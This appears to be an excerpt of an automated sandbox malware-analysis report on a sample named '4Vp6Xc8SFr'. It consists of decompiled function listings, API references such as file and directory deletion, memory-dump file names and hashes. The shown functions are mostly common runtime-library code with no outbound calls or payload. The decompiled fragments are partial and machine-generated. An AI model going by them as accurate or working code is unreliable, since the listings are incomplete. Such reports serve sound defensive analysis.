SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DA8E6751), ref: 00007FF7DA8E690D

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: 9ec0a8e6c5ce00d36eaa55dced753a90260fdad876e8f33a31f5c1658c0b2348
Instruction ID: 34115ce1128455d82aaab868119266a4cab0d3f00043f163fbf9088c2856c702
Opcode Fuzzy Hash: 9ec0a8e6c5ce00d36eaa55dced753a90260fdad876e8f33a31f5c1658c0b2348
Instruction Fuzzy Hash: A1017C2261C292C2E7516F14A44113EF7A1FB91B71FE00277EAAE425D9DF3ED564CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E9D68 Relevance: 3.0, APIs: 2, Instructions: 19
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 68%

			E00007FF77FF7DA8E9D68(intOrPtr* __rax, void* __rcx) {
				int _t1;
				intOrPtr _t3;
				void* _t4;
				void* _t11;
				intOrPtr _t14;

				if (__rcx == 0) goto 0xda8e9da3;
				_t14 =  *0xda91d260; // 0x25976da0000, executed
				_t1 = HeapFree(_t11, ??); // executed
				if (_t1 != 0) goto 0xda8e9d9e;
				_t3 = E00007FF77FF7DA8E42C0(GetLastError(), __rax, _t14, __rcx);
				_t4 = E00007FF77FF7DA8E4394(__rax);
				 *__rax = _t3;
				return _t4;
			}

0x7ff7da8e9d6b
0x7ff7da8e9d77
0x7ff7da8e9d7e
0x7ff7da8e9d86
0x7ff7da8e9d90
0x7ff7da8e9d97
0x7ff7da8e9d9c
0x7ff7da8e9da3

APIs

RtlReleasePrivilege.NTDLL(?,?,?,00007FF7DA8F1D92,?,?,?,00007FF7DA8F1DCF,?,?,00000000,00007FF7DA8F2295,?,?,?,00007FF7DA8F21C7), ref: 00007FF7DA8E9D7E
GetLastError.KERNEL32(?,?,?,00007FF7DA8F1D92,?,?,?,00007FF7DA8F1DCF,?,?,00000000,00007FF7DA8F2295,?,?,?,00007FF7DA8F21C7), ref: 00007FF7DA8E9D88

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ErrorLastPrivilegeRelease
String ID:
API String ID: 1334314998-0
Opcode ID: 331a8c6299aeae9f3295a3151f49c926d91e1c45e425888c05f84f3a32f5048a
Instruction ID: afb52fd6ccf52f2d6534540cd6ea56b91d891a55f3f98ad3189b237571a15167
Opcode Fuzzy Hash: 331a8c6299aeae9f3295a3151f49c926d91e1c45e425888c05f84f3a32f5048a
Instruction Fuzzy Hash: ABE08614F0D203C6FF167BF2A44403CE6517FA4710BC448B2CD0D86253DE6DA5644230

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E6EC0 Relevance: 3.0, APIs: 2, Instructions: 12
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00007FF77FF7DA8E6EC0() {
				int _t1;
				void* _t9;
				void* _t10;

				_t1 = DeleteFileW(); // executed
				if (_t1 != 0) goto 0xda8e6ee0;
				E00007FF77FF7DA8E4308(GetLastError(), _t9, _t10);
				goto 0xda8e6ee2;
				return 0;
			}

0x7ff7da8e6ec4
0x7ff7da8e6ecc
0x7ff7da8e6ed6
0x7ff7da8e6ede
0x7ff7da8e6ee6

APIs

DeleteFileW.KERNELBASE ref: 00007FF7DA8E6EC4
GetLastError.KERNEL32 ref: 00007FF7DA8E6ECE

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID:
API String ID: 2018770650-0
Opcode ID: 2e247283b98ea6ce82ead759ad145b4937c2f306634ca3fae332b7479a0f9e76
Instruction ID: 8686586c4a0649e8485634b286a5294df85e1fca7fbcc3b206068592f6ed3b45
Opcode Fuzzy Hash: 2e247283b98ea6ce82ead759ad145b4937c2f306634ca3fae332b7479a0f9e76
Instruction Fuzzy Hash: 74D0C910F18503C5F61677B1988543CA2903FA4730FE00AB2D81E801D3DE6EA6B90131

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E663C Relevance: 3.0, APIs: 2, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00007FF77FF7DA8E663C() {
				int _t1;
				void* _t9;
				void* _t10;

				_t1 = RemoveDirectoryW(); // executed
				if (_t1 != 0) goto 0xda8e665c;
				E00007FF77FF7DA8E4308(GetLastError(), _t9, _t10);
				goto 0xda8e665e;
				return 0;
			}

0x7ff7da8e6640
0x7ff7da8e6648
0x7ff7da8e6652
0x7ff7da8e665a
0x7ff7da8e6662

APIs

RemoveDirectoryW.KERNELBASE ref: 00007FF7DA8E6640
GetLastError.KERNEL32 ref: 00007FF7DA8E664A

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: DirectoryErrorLastRemove
String ID:
API String ID: 377330604-0
Opcode ID: 32a80bb3378596ce2224866d239cab53d38643b4ffb54b95134f306b6ae187c8
Instruction ID: a44d0da0222a589d9cf51598249ac57322789e375e45c688160a799b895edf6a
Opcode Fuzzy Hash: 32a80bb3378596ce2224866d239cab53d38643b4ffb54b95134f306b6ae187c8
Instruction Fuzzy Hash: 72D0C920F28503C1FA1637B1584603CA1903FA4730FD00AB6C82E811E3DEAEA2791521

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D6C10 Relevance: 1.6, APIs: 1, Instructions: 141COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7DA8D79A0: MultiByteToWideChar.KERNEL32 ref: 00007FF7DA8D79DA

_findclose.LIBCMT ref: 00007FF7DA8D6E69

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ByteCharMultiWide_findclose
String ID:
API String ID: 2772937645-0
Opcode ID: 239cefe38c06f9793475149507199f8f799df8b7831813140c3ac360e1f6e0b3
Instruction ID: ac971efe89d9a43cb9902d2d30313a1f63ad553b804c6491602d15925ac85c3c
Opcode Fuzzy Hash: 239cefe38c06f9793475149507199f8f799df8b7831813140c3ac360e1f6e0b3
Instruction Fuzzy Hash: 3E717F52E18AC581EA11DB2CD5052FDB360F7A9B48F95E321DF9D12593EF28E2D9C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EB2CC Relevance: 1.6, APIs: 1, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF7DA8EB2CC(signed int __edi, intOrPtr* __rax, long long __rbx, void* __rcx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {

				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				if (__rcx != 0) goto 0xda8eb314;
				E00007FF77FF7DA8E4394(__rax);
				 *__rax = 0x16;
				E00007FF77FF7DA8E9D00();
				return __edi | 0xffffffff;
			}

0x7ff7da8eb2cc
0x7ff7da8eb2d1
0x7ff7da8eb2d6
0x7ff7da8eb2e7
0x7ff7da8eb2e9
0x7ff7da8eb2ee
0x7ff7da8eb2f4
0x7ff7da8eb313

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8EB2F4

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: b8ff714229eac61573b8c54aef94970a551645be3ec3e531d410b1a1cea9ddf2
Instruction ID: 8e699729ed87ae0fc017f8a368cf2500401727d1eb1cabeba17cdb2a96c0e7f1
Opcode Fuzzy Hash: b8ff714229eac61573b8c54aef94970a551645be3ec3e531d410b1a1cea9ddf2
Instruction Fuzzy Hash: 3741DF32908241C3FA26AB19A54527DF3A1FB65B54FD04172DF8E836D2CF2EE612C761

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D7170 Relevance: 1.6, APIs: 1, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E00007FF77FF7DA8D7170(void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, void* __r8) {
				void* _t12;
				void* _t14;
				void* _t27;
				void* _t28;
				void* _t31;
				long long _t33;
				void* _t35;
				long long _t52;
				void* _t57;
				long long _t58;
				void* _t60;
				void* _t62;
				void* _t67;
				void* _t68;
				void* _t71;
				void* _t72;

				_t52 = __rdi;
				_t33 = __rbx;
				_t31 = __rax;
				_t67 = __rcx;
				_t57 = __r8;
				_t71 = __rdx;
				r13d = 0; // executed
				0xda8e4000(); // executed
				_t72 = __rax;
				if (__rax == 0) goto 0xda8d7283;
				_t1 = _t68 + 2; // 0x2
				r8d = _t1;
				_t12 = E00007FF77FF7DA8DF884(__rax, __rbx, __rcx, __rdi); // executed
				if (_t12 < 0) goto 0xda8d7283;
				 *((long long*)(_t62 + 0x50)) = _t33;
				E00007FF77FF7DA8E7888(__rax, _t33, _t67, _t52); // executed
				_t34 = _t31;
				if (_t31 - __r8 < 0) goto 0xda8d727e;
				 *((long long*)(_t62 + 0x58)) = _t58;
				 *((long long*)(_t62 + 0x60)) = _t52;
				_t5 = _t34 - 0x2000; // -8192
				_t60 =  <  ? _t68 : _t5;
				_t35 = _t31 - _t60;
				if (_t35 - __r8 < 0) goto 0xda8d7274;
				r8d = 0;
				_t14 = E00007FF77FF7DA8DF884(_t31, _t35, _t67, _t52); // executed
				if (_t14 < 0) goto 0xda8d7274;
				E00007FF77FF7DA8DF54C(_t60, _t35, _t67); // executed
				_t27 = _t31 - _t35;
				if (_t27 != 0) goto 0xda8d7274;
				if (_t27 == 0) goto 0xda8d725b;
				_t6 = _t72 - 1; // -1
				_t28 = E00007FF77FF7DA8DC740(0x2000, _t6 + _t35 - _t57 + 1, _t71, _t57);
				if (_t28 == 0) goto 0xda8d726d;
				if (_t28 != 0) goto 0xda8d7240;
				if (_t60 != 0) goto 0xda8d71e0;
				goto 0xda8d7274;
				return E00007FF77FF7DA8E3FEC(0x2000, _t72, _t71, _t57);
			}

0x7ff7da8d7170
0x7ff7da8d7170
0x7ff7da8d7170
0x7ff7da8d717e
0x7ff7da8d7181
0x7ff7da8d7189
0x7ff7da8d718c
0x7ff7da8d718f
0x7ff7da8d7194
0x7ff7da8d719a
0x7ff7da8d71a2
0x7ff7da8d71a2
0x7ff7da8d71a9
0x7ff7da8d71b0
0x7ff7da8d71b9
0x7ff7da8d71be
0x7ff7da8d71c3
0x7ff7da8d71c9
0x7ff7da8d71cf
0x7ff7da8d71d4
0x7ff7da8d71e7
0x7ff7da8d71ee
0x7ff7da8d71f2
0x7ff7da8d71f8
0x7ff7da8d71fa
0x7ff7da8d7203
0x7ff7da8d720a
0x7ff7da8d721a
0x7ff7da8d721f
0x7ff7da8d7222
0x7ff7da8d722b
0x7ff7da8d722d
0x7ff7da8d724e
0x7ff7da8d7250
0x7ff7da8d7259
0x7ff7da8d7265
0x7ff7da8d726b
0x7ff7da8d729b

APIs

_fread_nolock.LIBCMT ref: 00007FF7DA8D721A

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 68ca010f0fd644f89268626146362bb045ca7527ff30a2f35995bffdac70841f
Instruction ID: 4ccf802272e51feb13761ad83ddc974da8e47b45f59649c1d9c3c8a457ca2f70
Opcode Fuzzy Hash: 68ca010f0fd644f89268626146362bb045ca7527ff30a2f35995bffdac70841f
Instruction Fuzzy Hash: 15218121F0829189FE16AA12A5043BEE652BB45BD4FCC44B2EE4D06B87DF3DE562C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EAD5C Relevance: 1.6, APIs: 1, Instructions: 79
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF7DA8EAD5C(signed int __ecx, void* __esi, signed int __rbx, void* __rdx, signed int __rsi, signed int __r12, void* _a16, void* _a24, void* _a32) {
				signed int _t9;
				signed int* _t15;
				signed int* _t22;

				_t15 = _t22;
				_t15[4] = __rbx;
				_t15[6] = __rsi;
				_t15[8] = __r12;
				_t15[2] = __ecx;
				r14d = r8d;
				if (__esi != 0xfffffffe) goto 0xda8eadb6;
				E00007FF77FF7DA8E4374(_t15);
				 *_t15 =  *_t15 & 0x00000000;
				_t9 = E00007FF77FF7DA8E4394(_t15);
				 *_t15 = 9;
				return _t9 | 0xffffffff;
			}

0x7ff7da8ead5c
0x7ff7da8ead5f
0x7ff7da8ead63
0x7ff7da8ead67
0x7ff7da8ead6b
0x7ff7da8ead78
0x7ff7da8ead84
0x7ff7da8ead86
0x7ff7da8ead8b
0x7ff7da8ead8e
0x7ff7da8ead93
0x7ff7da8eadb5

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8EADE2

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 7817a0f28d0eb6c5fa3931f4599a67d6d6b3f8c1369c877220ee4ab0d307d010
Instruction ID: 8b9315fee26c8069a7819dab5a7549f5010ce3a20de1cfad2da0602544191b34
Opcode Fuzzy Hash: 7817a0f28d0eb6c5fa3931f4599a67d6d6b3f8c1369c877220ee4ab0d307d010
Instruction Fuzzy Hash: 70318B61A18652C5F612BB1588013BCEA50BB64FA6FD10AB6DE1D433D3CF7EA6618230

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E8709 Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00007FF77FF7DA8E8709(void* __ecx, char __edx, intOrPtr* __rax, long long __rbx, long long _a8, char _a16, char _a24, char _a32) {
				long long _v16;
				long long _v24;
				char _v32;
				long long _v40;
				char _v48;
				char _v52;
				void* _v56;
				void* _t28;
				intOrPtr* _t50;
				WCHAR* _t53;

				E00007FF77FF7DA8E9028();
				asm("int3");
				_a24 = r8d;
				_a16 = __edx;
				_v40 = 0xfffffffe;
				_a8 = __rbx;
				if (r8d != 0) goto 0xda8e877f;
				GetModuleHandleW(_t53);
				if (__rax == 0) goto 0xda8e877f;
				if ( *__rax != 0x5a4d) goto 0xda8e877f;
				_t50 =  *((intOrPtr*)(__rax + 0x3c)) + __rax;
				if ( *_t50 != 0x4550) goto 0xda8e877f;
				if ( *((intOrPtr*)(_t50 + 0x18)) != 0x20b) goto 0xda8e877f;
				if ( *((intOrPtr*)(_t50 + 0x84)) - 0xe <= 0) goto 0xda8e877f;
				if ( *((intOrPtr*)(_t50 + 0xf8)) == 0) goto 0xda8e877f;
				E00007FF77FF7DA8E8830(0x20b, __ecx, __rax);
				_a32 = 0;
				_v32 =  &_a16;
				_v24 =  &_a24;
				_v16 =  &_a32;
				_v52 = 2;
				_v48 = 2;
				_t28 = E00007FF77FF7DA8E860C(__rbx,  &_v48,  &_v32,  &_v52);
				if (_a24 == 0) goto 0xda8e87cd;
				return _t28;
			}

0x7ff7da8e8709
0x7ff7da8e870f
0x7ff7da8e8710
0x7ff7da8e8715
0x7ff7da8e8721
0x7ff7da8e8729
0x7ff7da8e8733
0x7ff7da8e8737
0x7ff7da8e8740
0x7ff7da8e874a
0x7ff7da8e8750
0x7ff7da8e8759
0x7ff7da8e8764
0x7ff7da8e876d
0x7ff7da8e8776
0x7ff7da8e877a
0x7ff7da8e877f
0x7ff7da8e8787
0x7ff7da8e878f
0x7ff7da8e8797
0x7ff7da8e87a0
0x7ff7da8e87a3
0x7ff7da8e87b6
0x7ff7da8e87c0
0x7ff7da8e87cc

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7DA8E8737

Part of subcall function 00007FF7DA8E8830: GetModuleHandleExW.KERNEL32 ref: 00007FF7DA8E8855
Part of subcall function 00007FF7DA8E8830: GetProcAddress.KERNEL32 ref: 00007FF7DA8E886B
Part of subcall function 00007FF7DA8E8830: FreeLibrary.KERNEL32 ref: 00007FF7DA8E8892

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 2312a5d6f4b211effc73cb1fcb8204366b0276267849894ad1c3aa5345b265bd
Instruction ID: 947323d2217bf0b560f748190e0ee3e54c4abe0b55c9dab412a0fcdcf0036200
Opcode Fuzzy Hash: 2312a5d6f4b211effc73cb1fcb8204366b0276267849894ad1c3aa5345b265bd
Instruction Fuzzy Hash: 0A217C32F05642C9FB26AF64C8402AC73A0FB64718F940636DE2C06AD6DF3ED664CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E5418 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00007FF77FF7DA8E5418(intOrPtr __ebp, long long __rbx, short* __rcx, long long __rdx, long long __rbp, void* __r8, long long __r9, char _a8, void* _a16, void* _a24, void* _a32) {
				long long _v48;
				long long _v56;
				void* __rsi;
				intOrPtr _t56;
				signed long long _t80;
				intOrPtr _t82;
				intOrPtr _t86;
				long long _t89;
				signed long long _t97;
				void* _t98;
				signed long long _t99;
				short* _t105;
				long long _t106;
				void* _t109;
				signed long long _t111;
				intOrPtr* _t117;
				long long _t125;

				r8d = 0x40;
				goto 0xda8e534c;
				asm("int3");
				_t80 = _t111;
				 *((long long*)(_t80 + 0x10)) = __rdx;
				_push(_t98);
				 *((long long*)(_t80 - 0x28)) = 0xfffffffe;
				 *((long long*)(_t80 + 0x18)) = __rbx;
				 *((long long*)(_t80 + 0x20)) = __rbp;
				_t89 = __r9;
				_t109 = __r8;
				_t105 = __rcx;
				r14d = 0;
				_t56 = r14d;
				if (__rcx == 0) goto 0xda8e5467;
				if (__r8 != 0) goto 0xda8e5463;
				goto 0xda8e560c;
				 *((intOrPtr*)(__rcx)) = r14w;
				if (__rdx != 0) goto 0xda8e5499;
				 *((char*)(__r9 + 0x30)) = 1;
				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
				_v48 = __r9;
				_v56 = _t125;
				r9d = 0;
				r8d = 0;
				E00007FF77FF7DA8E9C34(_t80, __r9, __rcx, __rdx, __rcx, __r8, __r8);
				goto 0xda8e560c;
				if ( *((intOrPtr*)(__r9 + 0x28)) != r14b) goto 0xda8e54ac;
				E00007FF77FF7DA8E3970(_t80 | 0xffffffff, __r9, __r9, _t105, _t125);
				_t82 =  *((intOrPtr*)(__r9 + 0x18));
				if ( *((intOrPtr*)(_t82 + 0xc)) != 0xfde9) goto 0xda8e54df;
				_a8 = _t125;
				_v56 = __r9;
				_t97 =  &_a16;
				E00007FF77FF7DA8EF4CC(_t82, __r9, _t105, _t97, _t109,  &_a8);
				goto 0xda8e560c;
				if (_t105 == 0) goto 0xda8e55c1;
				if ( *((intOrPtr*)(_t82 + 0x138)) != 0) goto 0xda8e551a;
				if (_t109 == 0) goto 0xda8e5512;
				 *_t105 =  *(_t98 + _t97) & 0x000000ff;
				if ( *(_t98 + _t97) == r14b) goto 0xda8e5512;
				_t99 = _t98 + 1;
				_t106 = _t105 + 2;
				if (_t99 - _t109 < 0) goto 0xda8e54f9;
				goto 0xda8e560c;
				_v48 = __ebp;
				_v56 = _t106;
				r9d = _t56;
				E00007FF77FF7DA8EE740();
				if (_t99 != 0) goto 0xda8e5609;
				if (GetLastError() == 0x7a) goto 0xda8e555c;
				 *((char*)(_t89 + 0x30)) = 1;
				 *((intOrPtr*)(_t89 + 0x2c)) = 0x2a;
				 *_t106 = r14w;
				goto 0xda8e5512;
				r9d = __ebp;
				_t117 = _a16;
				if (__ebp == 0) goto 0xda8e5595;
				r9d = r9d - 1;
				if ( *_t117 == r14b) goto 0xda8e5595;
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t89 + 0x18)))) + _t97 * 2)) - r14w >= 0) goto 0xda8e558d;
				if ( *((intOrPtr*)(_t117 + 1)) == r14b) goto 0xda8e554b;
				goto 0xda8e5569;
				r8d = r8d - r10d;
				_t86 =  *((intOrPtr*)(_t89 + 0x18));
				_v48 = __ebp;
				_v56 = _t106;
				r9d = r8d;
				E00007FF77FF7DA8EE740();
				if (_t86 != 0) goto 0xda8e560c;
				goto 0xda8e554b;
				if (_t86 != 0) goto 0xda8e55d8;
				if ( *((intOrPtr*)(_t97 + (_t99 | 0xffffffffffffffff) + 1)) != r14b) goto 0xda8e55ca;
				goto 0xda8e5512;
				_v48 = r14d;
				_v56 = _t125;
				r9d = _t56;
				E00007FF77FF7DA8EE740();
				if (_t86 != 0) goto 0xda8e5609;
				 *((char*)(_t89 + 0x30)) = 1;
				 *((intOrPtr*)(_t89 + 0x2c)) = 0x2a;
				goto 0xda8e5512;
				return _t86;
			}

0x7ff7da8e5418
0x7ff7da8e541e
0x7ff7da8e5423
0x7ff7da8e5424
0x7ff7da8e5427
0x7ff7da8e542c
0x7ff7da8e5433
0x7ff7da8e543b
0x7ff7da8e543f
0x7ff7da8e5443
0x7ff7da8e5446
0x7ff7da8e5449
0x7ff7da8e544c
0x7ff7da8e544f
0x7ff7da8e5455
0x7ff7da8e545a
0x7ff7da8e545e
0x7ff7da8e5463
0x7ff7da8e546a
0x7ff7da8e546c
0x7ff7da8e5471
0x7ff7da8e5479
0x7ff7da8e547e
0x7ff7da8e5483
0x7ff7da8e5486
0x7ff7da8e548b
0x7ff7da8e5494
0x7ff7da8e549d
0x7ff7da8e54a2
0x7ff7da8e54ac
0x7ff7da8e54b9
0x7ff7da8e54bb
0x7ff7da8e54c0
0x7ff7da8e54cd
0x7ff7da8e54d5
0x7ff7da8e54da
0x7ff7da8e54e9
0x7ff7da8e54f2
0x7ff7da8e54f7
0x7ff7da8e54fd
0x7ff7da8e5504
0x7ff7da8e5506
0x7ff7da8e5509
0x7ff7da8e5510
0x7ff7da8e5515
0x7ff7da8e551a
0x7ff7da8e551e
0x7ff7da8e5527
0x7ff7da8e5530
0x7ff7da8e553a
0x7ff7da8e5549
0x7ff7da8e554b
0x7ff7da8e554f
0x7ff7da8e5556
0x7ff7da8e555a
0x7ff7da8e555c
0x7ff7da8e5564
0x7ff7da8e5569
0x7ff7da8e556b
0x7ff7da8e5571
0x7ff7da8e5583
0x7ff7da8e558b
0x7ff7da8e5593
0x7ff7da8e5595
0x7ff7da8e5598
0x7ff7da8e559c
0x7ff7da8e55a0
0x7ff7da8e55a5
0x7ff7da8e55b3
0x7ff7da8e55bd
0x7ff7da8e55bf
0x7ff7da8e55c8
0x7ff7da8e55d1
0x7ff7da8e55d3
0x7ff7da8e55d8
0x7ff7da8e55dd
0x7ff7da8e55e2
0x7ff7da8e55ed
0x7ff7da8e55f7
0x7ff7da8e55f9
0x7ff7da8e55fd
0x7ff7da8e5604
0x7ff7da8e561e

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8E537D

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

